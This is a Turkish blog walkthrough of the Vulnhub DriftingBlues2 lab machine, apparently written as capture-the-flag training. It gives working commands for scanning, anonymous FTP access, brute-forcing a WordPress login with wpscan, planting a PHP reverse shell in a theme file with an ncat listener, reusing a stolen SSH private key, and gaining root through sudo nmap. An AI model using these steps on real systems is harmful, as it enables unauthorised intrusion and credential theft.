Vulnhub DRIFTINGBLUES2 Ctf Çözümü
Merhabalar, bu yazımızda CTF (Capture the flag) bayrağı bulmaya çalışacağız. CTF genellikle zafiyetli makineleri hacklemeye çalışılan bir yarışma türüdür.
Böylece siber hackerlar hem kendini geliştirir, hem de pratik yapmış olur. Bizde bugün Vulnhub sitesindeki zafiyetli makineyi ele geçirmeye çalışacağız.
Sizde bizle birlikte vulnhub zafiyetli makina, zafiyetli makine çözümü yapabilirsiniz.
Bu yazıyı bir yandan okurken diğer yandan da bizle beraber zafiyetli makineyi ele geçirmeye çalışabilirsiniz. Kendinizi geliştirmede büyük bir fayda sağlayabilirsiniz.
- Makine İsmi: DriftingBlues2
- Web Sitesi: Vulnhub
- Seviye: Kolay
1- Vulnhub Driftingblues2 makinesini ele geçirmeye çalışacağız.
İndirme Linki: Vulnhub DriftingBlues2
2- İndirilen .ova dosyasını iki kere tıklıyoruz ve direkt olarak sanal makine olarak karşımıza çıkıyor. Bitir dedikten sonra ince ayarları yapmaya başlıyoruz. (Biz VirtualBox’ı kullanıyoruz.)
3- Sağ tıklayıp > ayarlar kısmından Köprü bağdaştırıcısı seçin.
Karma kipi olarak Tümüne izin ver diyere tamam diyip çıkıyoruz.
4- Makineyi çalıştırdık artık zafiyetli makinemiz çalışıyor.
Şu an kendi Kali Linux’umuzu açarak başlıyoruz.
5- Terminali açtık. netdiscover yazarak ağımızdaki cihazları görüyoruz.
Zafiyetli makinemiz “PCS Systemtechnik GmbH” olarak çalışıyor.
Anladığımız hedef ip adresimiz burası.
6- Nmap aracı ile -sV komutu ile port versiyonlarını görüyoruz. -sC Nmap scriptleri kullanıyoruz. -p- ile tüm portları -vv parametresi ile detaylı olarak portları görüyoruz.
nmap -sV -sC -A -p- -vv hedef makine ip adresi
7- Hedef makinede 21,22,80 port olduğunu görmüş olduk.
Görüyoruz ki 21.port ftp üzerinde Anonymous olarak dışarıdan giriş sağlayabiliyoruz.
21. port zafiyetli olduğu için ftp bağlantı kurabiliriz.
8- ftp hedef makine adresi yazdık.
user: anonymous ve şifre anonymous yazıp giriş yapıyoruz.
ls -la komutu ile bakıyoruz secret olarak görsel olduğunu görüyoruz.
get secret.jpg yaparak root dizinine indiriyoruz.
9- Siteyi inceliyoruz ve karşımıza en alt kısımda da anladığımız gibi CMS olarak WordPress altyapısında olduğunu anlıyoruz.
10- Yazıları tıkladık ve karşımıza böyle bir boş sayfa geldi. Üstten de gördüğümüz gibi asıl hedef adresimiz “driftingblues.box” host olarak ekliyoruz.
11-sudo nano /etc/hosts
yazıyoruz
Karşımıza host adresleri gelecek.
12- Hedef makine ip adresini ekliyoruz yanına driftingblues.box olarak ekledik ve CTRL +x yapıp enter yapıp çıkıyoruz.
13-wpscan –url http://driftingblues.box/blog –detection-mode aggressive -e –passwords=/usr/share/wordlists/rockyou.txt
Wpscan aracı ile hedef siteyi agresif olarak tarıyoruz kullanıcı adını tespit ettikten sonra şifre kısmına brute force saldırısı yapmasını istiyoruz.
14- Hedef sitede kullanıcı adını tespit ettikten sonra şifre kısmına brute force saldırısı yaptık ve şifreyi bulmuş olduk.
username: albert password: scotland1
15- Admin paneline gittik ve bulduğumuz kullanıcı adı ve şifreyle siteye giriş yapıyoruz.
16- Github Pentest Monkey adresini gidiyoruz
php-reverse.shell.php içerisindeki kodların tamamını kopyalıyoruz.
17- Theme File editör kısmına giriyoruz daha sonra 404.php bulup açıyoruz.
- İçerisindeki hepsini sildikten sonra kopyaladıklarımızı yapıştırıyoruz.
- Change this kısmından ip adresini kendi makinemizin adresini yazıyoruz. Port kısmına açtığımız portu yazıyoruz.
- Terminale ifconfig yazın eth0 veya wlan0 kısmında ki kendi ip adresinizdir.
- Modemden de port açarak 9001 olarak açabilirsiniz. Port açmayı unutmayın yoksa geri bağlantı alamazsınız.
18- ncat -lvnp 9001 yaparak reverse shell sonrası terminalimize geri bağlantıyı bekliyoruz.
404.php açtığımızda direkt olarak siteden geri bağlantı olarak makineye erişim hakkı kazanmış olacağız.
19- http://driftingblues.box/blog/index.php/2020/12/17/<>/ yazıp enter yaptıktan sonra direkt olarak terminale bağlantı gelecektir.
20- Gördüğünüz gibi bağlantı geldi artık istediğimiz gibi makineyi ele geçirebiliriz.
İlginizi çekebilecek yazımız: Wannacry Taklitçisi Rus Oyuncuları Hedefliyor
21- cat /etc/passwd yazarak detaylı inceliyoruz.
Gördüğümüz gibi hedef kullanıcımız freddie kullanıcısı.
22- cd /home/freddie içerisine geçiş yaptık.
ls -la ile detaylı listeliyoruz.
Gördüğümüz gibi .ssh olan bizim 22.port üzerinden makine içerisine geçiş yapmamızı sağlayabilir.
23- cd .ssh içerisine geçiş yapıyoruz.
ls -la detaylı baktığımızda yine id_rsa görüyoruz bunun ile birlikte ssh içerisine girebiliriz.
24- cat id_rsa baktığımızda openssh private key görüyoruz.
Begın kısmında başlayıp end private keye kadar hepsini kopyalıyoruz.
25- Root içerisine gelip mousepad içerisine yapıştırıp kaydedip çıkıyoruz.
İsmini id_rsa. olarak kaydedelim.
26- chmod 700 id_rsa. yetkiyi veriyoruz.
Daha sonra ssh freddie@hedefipadresi -i id_rsa yaptık .
Artık freddie kullanıcısının içerisine geçiş yaptık.
27- ls dedik daha sonra cat user.txt yaparak ilk flagımızı bulduk.
28-sudo -l yaptık gördüğümüz gibi nmap kullanmamızı istiyor.
TF-$(mktemp)
echo ‘os.execute(“/bin/bash -i”)’ > $TF
sudo nmap –script=$TF
reset yazıp enter yaptığımızda direkt olarak root olarak geçiş yapıyoruz.
29- Artık root içerisindeyiz.
cat root.txt yaptık ve ikinci bayrağımıza bulmuş olduk.
VULNHUB DRIFTINGBLUES2 CTF makine çözümünün sonuna geldik.
Teşekkürler sağlıcakla kalın..